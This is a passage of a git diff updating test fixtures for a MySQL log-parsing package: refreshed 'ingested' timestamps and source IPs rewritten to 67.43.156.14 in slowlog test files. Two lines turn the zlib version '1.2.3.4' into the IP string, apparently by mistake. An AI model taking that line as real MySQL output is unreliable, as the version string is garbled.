"2016-12-09T14:18:55.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731003840Z", + "ingested": "2021-12-09T13:41:34.473616400Z", "category": [ "database" ], @@ -2512,7 +2512,7 @@ "@timestamp": "2016-12-09T14:18:55.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731004832Z", + "ingested": "2021-12-09T13:41:34.473622800Z", "category": [ "database" ], @@ -2527,7 +2527,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731005932Z", + "ingested": "2021-12-09T13:41:34.473629100Z", "category": [ "database" ], @@ -2541,7 +2541,7 @@ { "message": "ERROR: 1050 Table 'plugin' already exists", "event": { - "ingested": "2021-06-21T12:35:18.731007260Z", + "ingested": "2021-12-09T13:41:34.473636Z", "category": [ "database" ], @@ -2559,7 +2559,7 @@ }, "message": "Aborting", "event": { - "ingested": "2021-06-21T12:35:18.731008258Z", + "ingested": "2021-12-09T13:41:34.473642400Z", "category": [ "database" ], @@ -2574,7 +2574,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731009060Z", + "ingested": "2021-12-09T13:41:34.473648700Z", "category": [ "database" ], @@ -2589,7 +2589,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.731009937Z", + "ingested": "2021-12-09T13:41:34.473655Z", "category": [ "database" ], @@ -2604,7 +2604,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731012706Z", + "ingested": "2021-12-09T13:41:34.473661300Z", "category": [ "database" ], @@ -2622,7 +2622,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.731013919Z", + "ingested": "2021-12-09T13:41:34.473667900Z", "category": [ "database" ], @@ -2636,7 +2636,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731014699Z", + "ingested": "2021-12-09T13:41:34.473674300Z", "category": [ "database" ], @@ -2654,7 +2654,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.731015410Z", + "ingested": "2021-12-09T13:41:34.473680800Z", "category": [ "database" ], @@ -2672,7 +2672,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.731016111Z", + "ingested": "2021-12-09T13:41:34.473687100Z", "category": [ "database" ], @@ -2687,7 +2687,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731016835Z", + "ingested": "2021-12-09T13:41:34.473694100Z", "category": [ "database" ], @@ -2702,7 +2702,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731017611Z", + "ingested": "2021-12-09T13:41:34.473700Z", "category": [ "database" ], @@ -2715,9 +2715,9 @@ }, { "@timestamp": "2016-12-09T14:18:56.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731018308Z", + "ingested": "2021-12-09T13:41:34.473706300Z", "category": [ "database" ], @@ -2732,7 +2732,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731019016Z", + "ingested": "2021-12-09T13:41:34.473712500Z", "category": [ "database" ], @@ -2747,7 +2747,7 @@ "@timestamp": "2016-12-09T14:18:56.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731020166Z", + "ingested": "2021-12-09T13:41:34.473718800Z", "category": [ "database" ], @@ -2762,7 +2762,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731020842Z", + "ingested": "2021-12-09T13:41:34.473725100Z", "category": [ "database" ], @@ -2777,7 +2777,7 @@ "@timestamp": "2016-12-09T14:18:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731021499Z", + "ingested": "2021-12-09T13:41:34.473732400Z", "category": [ "database" ], @@ -2792,7 +2792,7 @@ "@timestamp": "2016-12-09T14:18:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595675", "event": { - "ingested": "2021-06-21T12:35:18.731022187Z", + "ingested": "2021-12-09T13:41:34.473737800Z", "category": [ "database" ], @@ -2810,7 +2810,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.731022845Z", + "ingested": "2021-12-09T13:41:34.473742Z", "category": [ "database" ], @@ -2828,7 +2828,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.731023637Z", + "ingested": "2021-12-09T13:41:34.473746200Z", "category": [ "database" ], @@ -2846,7 +2846,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.731024452Z", + "ingested": "2021-12-09T13:41:34.473751200Z", "category": [ "database" ], @@ -2864,7 +2864,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731025208Z", + "ingested": "2021-12-09T13:41:34.473757900Z", "category": [ "database" ], @@ -2882,7 +2882,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.731026015Z", + "ingested": "2021-12-09T13:41:34.473764200Z", "category": [ "database" ], @@ -2896,7 +2896,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.731026922Z", + "ingested": "2021-12-09T13:41:34.473770800Z", "category": [ "database" ], @@ -2914,7 +2914,7 @@ }, "message": "/usr/sbin/mysqld: Normal shutdown", "event": { - "ingested": "2021-06-21T12:35:18.731028158Z", + "ingested": "2021-12-09T13:41:34.473777Z", "category": [ "database" ], @@ -2928,7 +2928,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731029047Z", + "ingested": "2021-12-09T13:41:34.473783400Z", "category": [ "database" ], @@ -2946,7 +2946,7 @@ }, "message": "Event Scheduler: Purging the queue. 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731029761Z", + "ingested": "2021-12-09T13:41:34.473789600Z", "category": [ "database" ], @@ -2961,7 +2961,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Starting shutdown...", "event": { - "ingested": "2021-06-21T12:35:18.731030465Z", + "ingested": "2021-12-09T13:41:34.473795300Z", "category": [ "database" ], @@ -2976,7 +2976,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Shutdown completed; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.731031192Z", + "ingested": "2021-12-09T13:41:34.473813900Z", "category": [ "database" ], @@ -2994,7 +2994,7 @@ }, "message": "/usr/sbin/mysqld: Shutdown complete", "event": { - "ingested": "2021-06-21T12:35:18.731031964Z", + "ingested": "2021-12-09T13:41:34.473820300Z", "category": [ "database" ], @@ -3008,7 +3008,7 @@ { "message": "", "event": { - "ingested": "2021-06-21T12:35:18.731032693Z", + "ingested": "2021-12-09T13:41:34.473826500Z", "category": [ "database" ], @@ -3026,7 +3026,7 @@ }, "message": "Using unique option prefix myisam-recover instead of myisam-recover-options is deprecated and will be removed in a future release. Please use the full name instead.", "event": { - "ingested": "2021-06-21T12:35:18.731033555Z", + "ingested": "2021-12-09T13:41:34.473832700Z", "category": [ "database" ], @@ -3044,7 +3044,7 @@ }, "message": "Plugin 'FEDERATED' is disabled.", "event": { - "ingested": "2021-06-21T12:35:18.731034784Z", + "ingested": "2021-12-09T13:41:34.473837900Z", "category": [ "database" ], @@ -3059,7 +3059,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: The InnoDB memory heap is disabled", "event": { - "ingested": "2021-06-21T12:35:18.731035683Z", + "ingested": "2021-12-09T13:41:34.473844200Z", "category": [ "database" ], @@ -3074,7 +3074,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Mutexes and rw_locks use GCC atomic builtins", "event": { - "ingested": "2021-06-21T12:35:18.731036465Z", + "ingested": "2021-12-09T13:41:34.473850400Z", "category": [ "database" ], @@ -3087,9 +3087,9 @@ }, { "@timestamp": "2016-12-09T14:37:57.000Z", - "message": "InnoDB: Compressed tables use zlib 1.2.3.4", + "message": "InnoDB: Compressed tables use zlib 67.43.156.14", "event": { - "ingested": "2021-06-21T12:35:18.731037325Z", + "ingested": "2021-12-09T13:41:34.473856900Z", "category": [ "database" ], @@ -3104,7 +3104,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Initializing buffer pool, size = 128.0M", "event": { - "ingested": "2021-06-21T12:35:18.731038051Z", + "ingested": "2021-12-09T13:41:34.473863200Z", "category": [ "database" ], @@ -3119,7 +3119,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Completed initialization of buffer pool", "event": { - "ingested": "2021-06-21T12:35:18.731039146Z", + "ingested": "2021-12-09T13:41:34.473869400Z", "category": [ "database" ], @@ -3134,7 +3134,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: highest supported file format is Barracuda.", "event": { - "ingested": "2021-06-21T12:35:18.731039913Z", + "ingested": "2021-12-09T13:41:34.473875700Z", "category": [ "database" ], @@ -3149,7 +3149,7 @@ "@timestamp": "2016-12-09T14:37:57.000Z", "message": "InnoDB: Waiting for the background threads to start", "event": { - "ingested": "2021-06-21T12:35:18.731040652Z", + "ingested": "2021-12-09T13:41:34.473882Z", "category": [ "database" ], @@ -3164,7 +3164,7 @@ "@timestamp": "2016-12-09T14:37:58.000Z", "message": "InnoDB: 5.5.53 started; log sequence number 1595685", "event": { - "ingested": "2021-06-21T12:35:18.731041456Z", + "ingested": "2021-12-09T13:41:34.473888300Z", "category": [ "database" ], @@ -3182,7 +3182,7 @@ }, "message": "Server hostname (bind-address): '127.0.0.1'; port: 3306", "event": { - "ingested": "2021-06-21T12:35:18.731042229Z", + "ingested": "2021-12-09T13:41:34.473894600Z", "category": [ "database" ], @@ -3200,7 +3200,7 @@ }, "message": "- '127.0.0.1' resolves to '127.0.0.1';", "event": { - "ingested": "2021-06-21T12:35:18.731043027Z", + "ingested": "2021-12-09T13:41:34.473900900Z", "category": [ "database" ], @@ -3218,7 +3218,7 @@ }, "message": "Server socket created on IP: '127.0.0.1'.", "event": { - "ingested": "2021-06-21T12:35:18.731043891Z", + "ingested": "2021-12-09T13:41:34.473907200Z", "category": [ "database" ], @@ -3236,7 +3236,7 @@ }, "message": "Event Scheduler: Loaded 0 events", "event": { - "ingested": "2021-06-21T12:35:18.731044818Z", + "ingested": "2021-12-09T13:41:34.473914400Z", "category": [ "database" ], @@ -3254,7 +3254,7 @@ }, "message": "/usr/sbin/mysqld: ready for connections.", "event": { - "ingested": "2021-06-21T12:35:18.731045756Z", + "ingested": "2021-12-09T13:41:34.473918900Z", "category": [ "database" ], @@ -3268,7 +3268,7 @@ { "message": "Version: '5.5.53-0ubuntu0.12.04.1-log' socket: '/var/run/mysqld/mysqld.sock' port: 3306 (Ubuntu)", "event": { - "ingested": "2021-06-21T12:35:18.731046530Z", + "ingested": "2021-12-09T13:41:34.473924Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json index 1cde6943500..8833f11b9d6 100644 --- a/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json +++ b/packages/mysql/data_stream/error/_dev/test/pipeline/test-mysql-ubuntu-8-0-15.log-expected.json @@ -10,7 +10,7 @@ }, "message": "[MY-013169] [Server] /usr/sbin/mysqld (mysqld 8.0.15) initializing of server in progress as process 1640", "event": { - "ingested": "2021-06-21T12:35:19.977963724Z", + "ingested": "2021-12-09T13:41:35.240630300Z", "code": "MY-013169", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -33,7 +33,7 @@ }, "message": "[MY-010453] [Server] root@localhost is created with an empty password ! Please consider switching off the --initialize-insecure option.", "event": { - "ingested": "2021-06-21T12:35:19.977969667Z", + "ingested": "2021-12-09T13:41:35.240640Z", "code": "MY-010453", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -56,7 +56,7 @@ }, "message": "[MY-013170] [Server] /usr/sbin/mysqld (mysqld 8.0.15) initializing of server has completed", "event": { - "ingested": "2021-06-21T12:35:19.977972172Z", + "ingested": "2021-12-09T13:41:35.240646500Z", "code": "MY-013170", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -79,7 +79,7 @@ }, "message": "[MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.15) starting as process 1688", "event": { - "ingested": "2021-06-21T12:35:19.977973082Z", + "ingested": "2021-12-09T13:41:35.240652700Z", "code": "MY-010116", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -102,7 +102,7 @@ }, "message": "[MY-010068] [Server] CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:19.977973827Z", + "ingested": "2021-12-09T13:41:35.240659600Z", "code": "MY-010068", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -125,7 +125,7 @@ }, "message": "[MY-011810] [Server] Insecure configuration for --pid-file: Location '/tmp' in the path is accessible to all OS users. Consider choosing a different directory.", "event": { - "ingested": "2021-06-21T12:35:19.977974351Z", + "ingested": "2021-12-09T13:41:35.240664200Z", "code": "MY-011810", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -148,7 +148,7 @@ }, "message": "[MY-013172] [Server] Received SHUTDOWN from user boot. Shutting down mysqld (Version: 8.0.15).", "event": { - "ingested": "2021-06-21T12:35:19.977974872Z", + "ingested": "2021-12-09T13:41:35.240669300Z", "code": "MY-013172", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -171,7 +171,7 @@ }, "message": "[MY-010910] [Server] /usr/sbin/mysqld: Shutdown complete (mysqld 8.0.15) MySQL Community Server - GPL.", "event": { - "ingested": "2021-06-21T12:35:19.977975387Z", + "ingested": "2021-12-09T13:41:35.240675Z", "code": "MY-010910", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -194,7 +194,7 @@ }, "message": "[MY-010116] [Server] /usr/sbin/mysqld (mysqld 8.0.15) starting as process 1834", "event": { - "ingested": "2021-06-21T12:35:19.977975922Z", + "ingested": "2021-12-09T13:41:35.240680300Z", "code": "MY-010116", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -217,7 +217,7 @@ }, "message": "[MY-010068] [Server] CA certificate ca.pem is self signed.", "event": { - "ingested": "2021-06-21T12:35:19.977976440Z", + "ingested": "2021-12-09T13:41:35.240685600Z", "code": "MY-010068", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -240,7 +240,7 @@ }, "message": "[MY-010931] [Server] /usr/sbin/mysqld: ready for connections. Version: '8.0.15' socket: '/var/run/mysqld/mysqld.sock' port: 3306 MySQL Community Server - GPL.", "event": { - "ingested": "2021-06-21T12:35:19.977976957Z", + "ingested": "2021-12-09T13:41:35.240689900Z", "code": "MY-010931", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", @@ -263,7 +263,7 @@ }, "message": "[MY-011323] [Server] X Plugin ready for connections. Socket: '/var/run/mysqld/mysqlx.sock' bind-address: '::' port: 33060", "event": { - "ingested": "2021-06-21T12:35:19.977977684Z", + "ingested": "2021-12-09T13:41:35.240694800Z", "code": "MY-011323", "provider": "Server", "created": "2021-06-17T15:20:05.914488060Z", diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log index a451c6b7e40..8c23c8b6b84 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log @@ -1,5 +1,5 @@ # Time: 180613 11:04:36 -# User@Host: root[root] @ localhost [121.0.0.1] +# User@Host: root[root] @ localhost [67.43.156.14] # Thread_id: 5 Schema: QC_hit: No # Query_time: 2.000652 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0 SET timestamp=1528898676; diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json index 40c1789c121..79cf5a89bdb 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-1-21.log-expected.json @@ -18,12 +18,12 @@ "thread_id": 5 }, "source": { - "ip": "121.0.0.1", + "ip": "67.43.156.14", "domain": "localhost" }, "event": { "duration": 2000652000, - "ingested": "2021-06-21T12:35:20.266324325Z", + "ingested": "2021-12-09T13:41:35.485304400Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json index 4ca93d94190..dfe9f88f4d1 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-2-12.log-expected.json @@ -24,7 +24,7 @@ }, "event": { "duration": 2000227000, - "ingested": "2021-06-21T12:35:20.297388177Z", + "ingested": "2021-12-09T13:41:35.557203300Z", "category": [ "database" ], @@ -69,7 +69,7 @@ }, "event": { "duration": 178306016000, - "ingested": "2021-06-21T12:35:20.297389229Z", + "ingested": "2021-12-09T13:41:35.557211900Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json index 956145ba6c9..cc10e0bcd14 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-10-3-13.log-expected.json @@ -37,7 +37,7 @@ }, "event": { "duration": 2461578000, - "ingested": "2021-06-21T12:35:20.337400589Z", + "ingested": "2021-12-09T13:41:35.648745800Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json index 6e23b460725..d55613f3fd3 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mariadb-explain.log-expected.json @@ -23,7 +23,7 @@ }, "event": { "duration": 5524103000, - "ingested": "2021-06-21T12:35:20.361798659Z", + "ingested": "2021-12-09T13:41:35.708066900Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log index 506ec108f87..a30c318cb90 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log @@ -1,5 +1,5 @@ # Time: 2018-08-07T16:27:47.169604+08:00 -# User@Host: root[root] @ [218.76.8.37] Id: 7234 +# User@Host: root[root] @ [67.43.156.14] Id: 7234 # Query_time: 15.000223 Lock_time: 0.000000 Rows_sent: 1 Rows_examined: 0 SET timestamp=1533630467; select sleep(15); @@ -9,7 +9,7 @@ select sleep(15); SET timestamp=1533630467; SELECT count(*) FROM mysql.user WHERE user='root' and password=''; # Time: 2018-08-07T16:27:47.169604+08:00 -# User@Host: appuser[appuser] @ apphost [1.1.1.1] Id: 10997316 +# User@Host: appuser[appuser] @ apphost [67.43.156.14] Id: 10997316 # Query_time: 4.071491 Lock_time: 0.000212 Rows_sent: 1000 Rows_examined: 1489615 SET timestamp=1533630467; SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_order, GROUP_CONCAT(mca.mca_guid SEPARATOR ";") as mca_guid @@ -24,7 +24,7 @@ SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_o ORDER BY mcu.mcu_order ASC LIMIT 1000; # Time: 2018-08-07T16:27:47.169604+08:00 -# User@Host: appuser[appuser] @ apphost [1.1.1.1] Id: 10999834 +# User@Host: appuser[appuser] @ apphost [67.43.156.14] Id: 10999834 # Query_time: 10.346539 Lock_time: 0.000036 Rows_sent: 0 Rows_examined: 4751313 SET timestamp=1533630467; call load_stats(1, '2017-04-28 00:00:00'); diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json index 711660d6206..c93ec6c4558 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-5-7-22.log-expected.json @@ -17,11 +17,11 @@ "thread_id": 7234 }, "source": { - "ip": "218.76.8.37" + "ip": "67.43.156.14" }, "event": { "duration": 15000223000, - "ingested": "2021-06-21T12:35:20.377765006Z", + "ingested": "2021-12-09T13:41:35.728525400Z", "category": [ "database" ], @@ -54,7 +54,7 @@ }, "event": { "duration": 153000, - "ingested": "2021-06-21T12:35:20.377766884Z", + "ingested": "2021-12-09T13:41:35.728536500Z", "category": [ "database" ], @@ -84,12 +84,12 @@ "thread_id": 10997316 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 4071491000, - "ingested": "2021-06-21T12:35:20.377768625Z", + "ingested": "2021-12-09T13:41:35.728547300Z", "category": [ "database" ], @@ -119,12 +119,12 @@ "thread_id": 10999834 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10346539000, - "ingested": "2021-06-21T12:35:20.377770225Z", + "ingested": "2021-12-09T13:41:35.728558100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json index acc188bb501..0d8f4e370f9 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-darwin-brew-5-7-10.log-expected.json @@ -22,7 +22,7 @@ }, "event": { "duration": 11004467000, - "ingested": "2021-06-21T12:35:20.430622043Z", + "ingested": "2021-12-09T13:41:35.870852100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log index 2b92ad9c058..9ead07458b0 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log @@ -1,4 +1,4 @@ -# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 10997316 +# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 10997316 # Query_time: 4.071491 Lock_time: 0.000212 Rows_sent: 1000 Rows_examined: 1489615 SET timestamp=1493370459; SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_order, GROUP_CONCAT(mca.mca_guid SEPARATOR ";") as mca_guid @@ -13,12 +13,12 @@ SELECT mcu.mcu_guid, mcu.cus_guid, mcu.mcu_url, mcu.mcu_crawlelements, mcu.mcu_o ORDER BY mcu.mcu_order ASC LIMIT 1000; # Time: 2017-04-28T09:16:30.738365Z -# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 10999834 +# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 10999834 # Query_time: 10.346539 Lock_time: 0.000036 Rows_sent: 0 Rows_examined: 4751313 SET timestamp=1493370990; call load_stats(1, '2017-04-28 00:00:00'); # Time: 2017-04-28T09:31:31.133657Z -# User@Host: apphost[apphost] @ apphost [1.1.1.1] Id: 11004208 +# User@Host: apphost[apphost] @ apphost [67.43.156.14] Id: 11004208 # Query_time: 10.508030 Lock_time: 0.000034 Rows_sent: 0 Rows_examined: 4754675 SET timestamp=1493371891; call load_stats(1, '2017-04-28 00:00:00'); diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json index f254d70878a..cd7a0602d66 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-17.log-expected.json @@ -16,12 +16,12 @@ "thread_id": 10997316 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 4071491000, - "ingested": "2021-06-21T12:35:20.446734721Z", + "ingested": "2021-12-09T13:41:35.921854400Z", "category": [ "database" ], @@ -51,12 +51,12 @@ "thread_id": 10999834 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10346539000, - "ingested": "2021-06-21T12:35:20.446738422Z", + "ingested": "2021-12-09T13:41:35.921868700Z", "category": [ "database" ], @@ -86,12 +86,12 @@ "thread_id": 11004208 }, "source": { - "ip": "1.1.1.1", + "ip": "67.43.156.14", "domain": "apphost" }, "event": { "duration": 10508030000, - "ingested": "2021-06-21T12:35:20.446739371Z", + "ingested": "2021-12-09T13:41:35.921879500Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json index e96a1927e83..8148b2b8147 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-debian-5-7-19.log-expected.json @@ -20,7 +20,7 @@ }, "event": { "duration": 100000, - "ingested": "2021-06-21T12:35:20.487393663Z", + "ingested": "2021-12-09T13:41:36.047116100Z", "category": [ "database" ], diff --git a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json index a9ac3954785..615d73c8516 100644 --- a/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json +++ b/packages/mysql/data_stream/slowlog/_dev/test/pipeline/test-mysql-ubuntu-5-5-53.log-expected.json @@ -21,7 +21,7 @@ }, "event": { "duration": 153000, - "ingested": "2021-06-21T12:35:20.504197586Z", + "ingested": "2021-12-09T13:41:36.098106400Z", "category": [ "database" ], @@ -53,7 +53,7 @@ }, "event": { "duration": 2456000, - "ingested": "2021-06-21T12:35:20.504198144Z", + "ingested": "2021-12-09T13:41:36.098112100Z", "category": [ "database" ], @@ -85,7 +85,7 @@ }, "event": { "duration": 6278000, - "ingested": "2021-06-21T12:35:20.504198695Z", + "ingested": "2021-12-09T13:41:36.098118Z", "category": [ "database" ], @@ -117,7 +117,7 @@ }, "event": { "duration": 262000, - "ingested": "2021-06-21T12:35:20.504199245Z", + "ingested": "2021-12-09T13:41:36.098123500Z", "category": [ "database" ], @@ -149,7 +149,7 @@ }, "event": { "duration": 323000, - "ingested": "2021-06-21T12:35:20.504199799Z", + "ingested": "2021-12-09T13:41:36.098129Z", "category": [ "database" ], @@ -181,7 +181,7 @@ }, "event": { "duration": 7084000, - "ingested": "2021-06-21T12:35:20.504200347Z", + "ingested": "2021-12-09T13:41:36.098134500Z", "category": [ "database" ], @@ -213,7 +213,7 @@ }, "event": { "duration": 277000, - "ingested": "2021-06-21T12:35:20.504200888Z", + "ingested": "2021-12-09T13:41:36.098140Z", "category": [ "database" ], @@ -245,7 +245,7 @@ }, "event": { "duration": 254000, - "ingested": "2021-06-21T12:35:20.504201439Z", + 